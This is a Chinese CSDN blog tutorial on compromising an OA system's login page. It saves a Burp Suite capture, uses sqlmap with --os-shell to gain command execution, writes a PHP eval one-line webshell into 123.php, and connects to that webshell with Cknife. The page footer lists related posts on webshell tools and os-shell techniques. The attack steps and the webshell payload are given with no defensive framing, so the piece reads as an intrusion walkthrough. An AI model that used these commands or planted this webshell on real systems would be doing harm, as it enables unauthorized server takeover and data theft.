通过OA系统登录页面获取OS-shell

最新推荐文章于 2024-04-24 11:00:00 发布
最新推荐文章于 2024-04-24 11:00:00 发布
阅读量445 收藏 2
点赞数
分类专栏: 工具专区 文章标签: sql shell php sqlmap OA系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/118150293
版权

通过OA系统登录页面获取OS-shell

1. 使用工具介绍

  1. burpsuite:用来抓取登录页面的数据包
  2. sqlmap:探测sql注入点。–os-shell 大致原理是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令
  3. Cknife(同类工具还有冰蝎,蚁剑,哥斯拉):结合一句话木马,获取webshell

2. 思路介绍

  1. 首先抓取登录页面数据包,写入一个txt文档,放入sqlmap目录下
  2. 用sqlmap进行爆破,可以获取os-shell(OSshell是一个能执行系统命令的环境)
  3. 获取OSshell后,在目标系统内写一个木马文件
  4. 用Cknife进行连接,获取webshell

3. 详细步骤

3.1 抓包

  1. 登录页面 http://192.168.179.128:8005/index.php

在这里插入图片描述
2. 抓包

在这里插入图片描述

  1. 复制抓包的内容,保存为txt文件到sqlmap目录下

在这里插入图片描述

3.2 运行sqlmap(重点)

–os-shell 大致原理是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令

  1. sqlmap.py -r OAlogin.txt --os-shell

    -r 表示从文件中读取http请求

    1. 选择语言

在这里插入图片描述

  1. 输入绝对路径
    /var/www/html/upload

在这里插入图片描述

  1. 写木马文件

    pwd  	//查看当前路径

echo ‘<?php @eval($_POST['a']); ?>’ >> 123.php    //将<?php @eval($_POST['a']); ?>写入123.php

cat 123.php		//打印123.php文件的内容

在这里插入图片描述

3.3 Cknife连接

  1. 输入木马文件的 url

在这里插入图片描述

  1. 连接,获取webshell

在这里插入图片描述

Buffedon
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php 原理 淘口令 解密_Sqlmaposshell原理分析
weixin_30118919的博客
12-30 499
点击蓝字关注我们声明本文作者:Gality本文字数:5000阅读时长:30min附件/链接:点击查看原文下载声明:请勿用作违法用途,否则后果自负本文属于WgpSec原创奖励计划,未经许可禁止转载前言最近跟一些同伴分享面试经验时发现,在面那些出名的安全厂商时,面试官很喜欢问os-shell相关的原理,网上的分析杂七杂八,大多是相互抄袭,作者并没有真正去实践这些技术,也缺少对sqlmap源码...
简单的OA系统管理页面模板.zip
03-13
1.OA 2.zip 3.系统管理 4.模板 5.页面 6.简单
网红漏洞“致远OA系统上的GetShell漏洞”详解
systemino的博客
07-08 1万+
概述 腾讯御界高级威胁检测系统近期监测到“致远OA系统上的 GetShell漏洞”在网上被频繁利用攻击政企客户。 对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传webshell。 腾讯驻场工程师通过御界高级威胁检测系统告警通知及时向客户通报并采取必要措施,客户业务系统未受攻击影响。 详细分析 该漏洞最早于6月26号左右,有安全厂商发出漏洞预警。 远程攻击者在无需登录的...
webshell管理工具-哥斯拉( Godzilla)的安装和基础使用
最新发布
m0_59598029的博客
04-24 893
哥斯拉全部类型的shell均过市面所有静态查杀哥斯拉流量加密过市面全部流量waf哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的可见其强大之处,具体介绍可以在github上面去了解:https://github.com/BeichenDream/Godzilla从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
【归档】[OS] Shell脚本
AIsland 的博客
11-03 855
Shell脚本是什么?通俗的解释就是一堆Linux命令的逻辑化处理。为什么要编写Shell脚本?在做开发的时候,有的时候需要部署环境或者是打包发布,往往都需要在终端里敲好多的命令才能做一件事,但是如果每次部署都要敲一堆命令,那么效率是非常低的,也会使人感到烦躁。所以,我们可以编写Shell脚本,将要执行的命令写在一起,用的时候只需要运行一下脚本就一切都搞定了。从第一行开始!为了确保Shell脚本可以
【归档】[OS] Shell
AIsland 的博客
11-03 1271
作业链接:Homework: shell这次作业主要是使大家更加了解Shell、系统调用以及Shell的工作原理。借助6.828 Shell来进行扩展,可以将其运行在支持Unix API的操作系统上,比如:Linux、MacOS。可以阅读xv6 book的Chapter 0来了解一下操作系统的接口。第一步:下载6.828 shell的源代码 sh.c ,代码主要包含两部分:解析Shell命令和运行命
sqlmap —— os-shell参数分析
未完成的歌~的博客
10-07 3515
文章目录前言:一、os-shell执行原理二、测试环境:三、过程演示1、测试权限2、攻击3、选择语言4、输入绝对路径5、建立 os-shell 并执行命令四、原理分析总结: 前言: 最近在看sqlmap,发现--os-shell这个命令很厉害,所以来研究一下。 一、os-shell执行原理 对于 Mysql 数据库来说,--os-shell的本质就是写入两个 php 文件,其中的一个可以让我们用来执行命令,而另外一个可以让我们可以上传文件。 说到写入文件,就要说一下上传文件的两个前提条件,首先我们要知道网站
一文了解--os-shell原理及条件
allintao的博客
03-21 982
本文主要介绍关于sqlmap中--os-shell拿到shell的原理及条件。
蓝色企业员工OA管理系统登录页面模板
07-13
【标题】:“蓝色企业员工OA管理系统登录页面模板” 在IT领域,OA(Office Automation)系统是一种广泛应用于企业管理中的自动化办公软件,旨在提升工作效率,优化工作流程。本资源提供的是一个“蓝色企业员工OA...
OA系统系统方案-标准版V2.docx
05-26
OA系统系统方案-标准版
OA系统系统方案-标准版V2.doc
05-26
OA系统系统方案-标准版V2
网页链接提取精灵
03-19
1.提取出指定网站内部的所有url工具(不提取对应url的内容),比如导航、目录站所有网站url提取
java开发oa系统源码下载-wps-master:wps-master
06-05
java开发oa系统源码下载 WPS二次开发 这是WPS二次开发的开源代码仓库,采用BSD开源协议,详见。 如果您是第一次刷到这个仓库 完成填写后,可以加3253920855这个QQ,明确告知需求。 如果您想了解现在WPS集成的最佳...
关于--os-shell写webshell
qq_40806924的博客
07-30 2022
1.首先需要知道目录(web目录) 2.得是DBA权限 寻找web目录 dir C:\ /s /b | find “xLogin.aspx” 这里需要注意转义^ echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx' os-shell 无法执行的时候,权限低的时候可以尝试 sql-shell写webshell select
oracle中执行os命令(转)
congnen9588的博客
06-04 237
I can think of a couple of different ways....o In Oracle8i, release 8.1, we could use java to run a system command...
sqlmap --os-shell 原理详解
热门推荐
..
04-13 2万+
os-shell 执行原理 对于mysql数据库来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下,如下图。 然后sqlmap就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。 这是单看tmpbylqf.php的执行效果: 过程演示 本次实验环境是本机上搭建的sqli-libs,目的为了研究--os-shell的原理,..
记一次sqlmap的--os-shell的实战
weixin_53884648的博客
08-07 460
通过实战简单的进行sqlmap的--os-shell的利用
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell,2024年最新帮助程序员提高核心竞争力的30条建议
m0_62289956的博客
04-15 739
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。-p php/meterpreter_reverse_tcp:指定生成的payload类型为PHP的Meterpreter反向TCP shell。lport=4444:指定本地主机的端口号,也就是反向连接的目标主机的监听端口号。-o shell.php:指定生成的payload文件的名称为shell.php。① sqlmap注入测试。
浅谈OS命令注入漏洞(Shell注入漏洞)
Z614655003的博客
07-13 1042
浅谈OS命令注入漏洞(Shell注入漏洞)
OA-ERP软件系统安装指南.docx
11-27
"OA-ERP软件系统安装指南"是一份由秋葵软件开发于2007年07月01日发布的文档,版权归属于该软件公司,主要用于演示和教育用途。这份文档是对OA-ERP软件的安装过程进行详尽介绍的初级教程,旨在帮助初次接触或想要了解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值